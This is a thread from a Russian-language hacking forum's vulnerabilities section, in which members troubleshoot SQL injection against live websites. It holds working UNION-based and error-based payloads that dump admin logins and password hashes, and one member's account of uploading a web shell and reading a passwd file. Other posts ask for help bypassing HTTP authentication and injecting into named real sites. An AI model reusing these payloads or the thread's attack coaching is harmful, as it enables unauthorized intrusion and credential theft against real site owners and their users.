HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.01.2016, 00:54
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от PulsarEX547  
PulsarEX547 said:

2winstrool, спасибо! запрос сработал без заминок
, единственное я бы хотел спросить как называется данный тип sqlinjection? и где можно поподробнее почитать гайдик нормальный по этой теме, для продвинутых если можно так сказать
.
/threads/43966/ -

SQL injection полный FAQ
 
Ответить с цитированием

  #2  
Старый 19.01.2016, 01:12
ArmusIAm
Guest
Сообщений: n/a
Провел на форуме:
7147

Репутация: 0
По умолчанию

Цитата:
Сообщение от Kolyan333  
Kolyan333 said:

Ниче не помогло
Бро, ты конечно извини, но я не экстрасенс и не врач. Хочешь чтобы тебе помогли, описывай сложности как можно подробнее
 
Ответить с цитированием

  #3  
Старый 19.01.2016, 01:46
PulsarEX547
Guest
Сообщений: n/a
Провел на форуме:
3988

Репутация: 0
По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:

/threads/43966/
-
SQL injection полный FAQ
спс, разобрался вроде) делаю финальный запрос:

(select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x)

в ответ тишина, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...
 
Ответить с цитированием

  #4  
Старый 19.01.2016, 12:39
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от PulsarEX547  
PulsarEX547 said:

спс, разобрался вроде) делаю финальный запрос:
(select (@x) from (select (@x:=0x00),(select (0) from (admin)where (0x00) in (@x:=concat(@x,0x3c62723e,username,0x3a,pass))))x)
в ответ тишина
, хотя с других таблиц вывод идет.. может быть просто эти поля в таблице пустые? или я что то непонимаю.... сколько старний аш обидно блин...
Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin
 
Ответить с цитированием

  #5  
Старый 19.01.2016, 12:51
kao
Guest
Сообщений: n/a
Провел на форуме:
261

Репутация: 0
По умолчанию

хотел скачать рисунок, а там http авторизация походу. как обойти?

http://naklejka.ru/image/data/naklej.../bpan-red2.svg

Сорри, если не туда задал вопрос
 
Ответить с цитированием

  #6  
Старый 19.01.2016, 14:58
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от sysjuk  
sysjuk said:

Залил шелл, через пару минут его удалили и закрыли уязвимость. Успел лишь прочесть файл passwd - есть в нем строчка:
asd.s1:$6$xWwfrGmNk3/4$DPN8qC1EU3vmjju8da3j1YBXOb6UIkyo7PC3xClb1R.l6Maj oyZsZpyn6FA0dyAntmH0WLw37F29TnV7qurOE1:604:604:
asd.s1@asd.asd.ua
:/home/asd.s1:/bin/bash
Как я понимаю зашифрован пароль или я ошибаюсь?
Заранее спасибо за ответ.
Да пароль SHA512(Unix) https://en.wikipedia.org/wiki/Passwd#Shadow_file
 
Ответить с цитированием

  #7  
Старый 19.01.2016, 15:58
PulsarEX547
Guest
Сообщений: n/a
Провел на форуме:
3988

Репутация: 0
По умолчанию

наз

Цитата:
Сообщение от kingbeef  
kingbeef said:

Попробуй к таблице добавить имя БД, либо уже посмотри, есть в данной таблице записи count(*) from BD.admin
название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:?

делаю такой, но он судя по всему неправильный:

?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20 --+

подскажите как задать правильный запрос на проверку записей в полях таблицы?

также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))
 
Ответить с цитированием

  #8  
Старый 19.01.2016, 18:21
ArmusIAm
Guest
Сообщений: n/a
Провел на форуме:
7147

Репутация: 0
По умолчанию

Цитата:
Сообщение от PulsarEX547  
PulsarEX547 said:

наз
название бд добавлял, результата недало, а вот посмотреть есть ли там вообще что то было бы неплохо, но я несовсем понимаю как дать такой запрос:?
делаю такой, но он судя по всему неправильный
:
?id=-613+union+select+1,COUNT(login,pass) FROM admin,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, 20 --+
подскажите как задать правильный запрос на проверку записей в полях таблицы?
также хотелось бы отметить что из других таблиц вывод идет как положенно, а тут скорее всего пустота, хотя и очень странно все это)))
?id=-613+union+select+1,COUNT(login,pass),3,4,5,6,7,8,9 ,10,11,12,13,14,15,16,17,18,19,20 FROM admin--+

Если все правильно понял.
 
Ответить с цитированием

  #9  
Старый 19.01.2016, 22:18
Sensoft
Guest
Сообщений: n/a
Провел на форуме:
104689

Репутация: 1
По умолчанию

Ребят помогите пожалуйста

Считается это уязвимостью ?

Я отправил пост запрос с таким кодом

.SpoilerTarget" type="button">Spoiler: Код
&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
и выдало это

 
Ответить с цитированием

  #10  
Старый 19.01.2016, 23:22
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

ребятки, можно тут что-то сделать. ЧТо то там с ' and " не понятно как-то

http://missourimhf.org/view-event.php?id=
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ